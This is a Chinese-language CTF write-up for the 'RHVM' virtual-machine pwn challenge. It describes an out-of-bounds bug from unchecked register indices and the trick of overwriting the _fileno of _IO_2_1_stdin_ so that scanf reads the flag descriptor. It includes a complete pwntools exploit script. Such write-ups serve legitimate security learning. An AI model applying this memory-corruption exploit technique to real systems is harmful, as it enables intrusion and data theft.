修改_fileno来让stdinfd中读数据

文件都在:Github

概览

最开始它获取了flag文件的文件描述符,并把它用dup2映射到0x233,这样我们就知道0x233是flag的文件描述符

然后定义了沙盒规则,不允许execvewrite,且虚拟机本身只能输入0x40道指令

漏洞点

它在处理指令的时候,有使用寄存器中的值作为index来存取它定的内存区的数据的操作,但是它却没有对寄存器进行检查

如果寄存器中是负数,那它就可以存取到内存区之外的数据,导致OOB

利用方法

  1. 读取到_IO_2_1_stdin_的地址
  2. 将它加0x6c(即定位到它-4的位置)
  3. 将栈地址覆盖成前两步修改后的地址
  4. push操作把0x233写到_IO_2_1_stdin__fileno
  5. 最后的scanf后的printf就会把flag打印出来

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
from pwn import *
context(arch='amd64',os='linux',log_level='debug')

sl = lambda x:io.sendline(x)
s = lambda x:io.send(x)
rn = lambda x:io.recv(x)
ru = lambda x:io.recvuntil(x, drop=True)
r = lambda :io.recv()
it = lambda: io.interactive()
success = lambda x, y:log.success(x + ' '+ hex(y))

binary = './RHVM.bin'
io = process(binary)
o = {"give":0x40, "print":0x60, "sub":208, 'memb':0x42}
ops = []
def add(a, b, c):
ops.append((a << 16) + (b << 8) + c)

def moveBtoRA(a, b):
add(0x40, a, b)

def printS():
add(0x60, 0, 0)

def RAsubRB(a, b):
add(208, a, b)

def RARdengyuRBM(a, b):
add(0x42, a, b)

def RAMdengyuRBR(a, b):
add(0x41, a, b)

def RAmulRB(a, b):
add(0xc0, a, b)

def RAzuoyiRB(a, b):
add(224, a, b)

def RAaddRB(a, b):
add(160, a, b)

def pushRA(a):
add(0x70, 0, a)


moveBtoRA(0, 6)
moveBtoRA(1, 4)
RAaddRB(0, 1)
RAsubRB(2, 0)
moveBtoRA(3, 5)
RAmulRB(3, 1)
RAsubRB(4, 3)
RARdengyuRBM(5, 4)
moveBtoRA(5, 6)
RAzuoyiRB(5, 1)
moveBtoRA(7, 8)
RAaddRB(0, 5)
RAaddRB(0, 7)
RAaddRB(0, 1)
RAMdengyuRBR(2, 0)
moveBtoRA(3, 1)
RAaddRB(2, 3)
RAaddRB(4, 3)
RARdengyuRBM(6, 4)
RAMdengyuRBR(2, 0)
moveBtoRA(0, 2)
moveBtoRA(2, 3)
RAzuoyiRB(0, 1)
RAaddRB(0, 2)
RAzuoyiRB(0, 1)
RAaddRB(0, 2)
pushRA(0)
printS()





io = process(binary)

ru('EIP: ')
sl('0')
ru('ESP: ')
sl('0')
ru('Give me code length: ')
sl(str(len(ops)))
ru('Give me code: ')
for i in ops:
sl(str(i))
it()

总结

主要是利用方法对我来说比较新颖,特此记录一下